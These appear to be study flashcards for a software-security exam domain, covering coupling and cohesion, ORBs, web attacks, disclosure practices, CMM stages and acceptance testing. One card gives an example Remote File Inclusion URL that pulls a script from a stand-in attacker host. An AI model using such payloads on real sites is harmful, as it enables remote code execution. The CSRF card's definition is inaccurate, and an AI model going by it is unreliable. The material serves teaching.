Domain 8: Software Security Flashcards
- OOP Term
- Used to describe level of an object’s dependence on other objects
Coupling
- OOP Term
- Used to describe the level of an object’s independence of other objects
Cohesion
- OOP Terms
- Object that greatly depends on another object
High Coupling and Low Cohesion
- OOP Terms
- Object that is mostly independent from other objects
High Cohesion and Low Coupling
- Used to locate objects act as search engines
- Connects programs to programs
- i.e. COM, DCOM, CORBA
Object Request Brokers (ORBs)
Escaping from the root of the web server (i.e. /var/www) into the regular file system by referencing directories such as “../’’”
Directory Path Traversal
Altering normal PHP URLs and variable to include and execute remote content
i.e. http://good.example.com?file=http://evil.example.com/bad.php
Remote File Inclusion (RFI)
Attacker attempts to alter a condition after it has been checked by the OS, but before it is used
Time of check/Time of use (TOC/TOU) attacks aka Race conditions
Leverages third-party execution of scripting languages within the security context of a trusted site
Cross-site scripting (XSS)
Leverages a third-party redirect of static content within the security context of a trusted site
Cross-site request forgery (CSRF)
Describes actions taken by the security researcher after discovering a software vulnerability
Disclosure
Practice of releasing vulnerability details publicly
Full disclosure
Practice of privately sharing vulnerability info with a vendor and withholding public release until a patch is available
Responsible disclosure
- Framework intended help software organizations improve the maturity and quality of the software process
- Categorizes 5 stages organization software processes go through to reach maturity
- Maturity framework for evaluating and improving the software development process
Software Capability Maturity Model (CMM)
Name the 5 stages of the Software Capability Maturity Model (CMM)
- Initial
- Repeatable
- Defined
- Managed
- Optimizing
- Software Capability Maturity Model (CMM) stage
- Little to no software processes are defined
Initial
- Software Capability Maturity Model (CMM) stage
- Basic project management processes are established to track cost, schedule, and functionality.
- Code is reused in similar projects to duplicate results
Repeatable
- Software Capability Maturity Model (CMM) stage
- The software process for both management and engineering activities is documented, standardized, and integrated into standard software process for the organization
Defined
- Software Capability Maturity Model (CMM) stage
- Detailed quantitative measures of the software process and product quality are collected, analyzed, and used to control the process.
Managed
- Software Capability Maturity Model (CMM) stage
- Continual process improvement is enabled by quantitative feedback from the process and from piloting innovative ideas and technologies.
Optimizing
- Examines whether software meets various end-state requirements,
- i.e. from a user or customer, contract, or compliance
Acceptance Testing
- International Software Testing Qualifications Board (ISTQB) acceptance testing level
- Focuses on the validating the fitness-for-use of the system by the business user
User Acceptance Test
- International Software Testing Qualifications Board (ISTQB) acceptance testing level
- Validates whether the system meets the requirements for operation
Operational Acceptance test
- International Software Testing Qualifications Board (ISTQB) acceptance testing level
- Performed against contract’s acceptance criteria for producing custom-developed software
Contract Acceptance testing
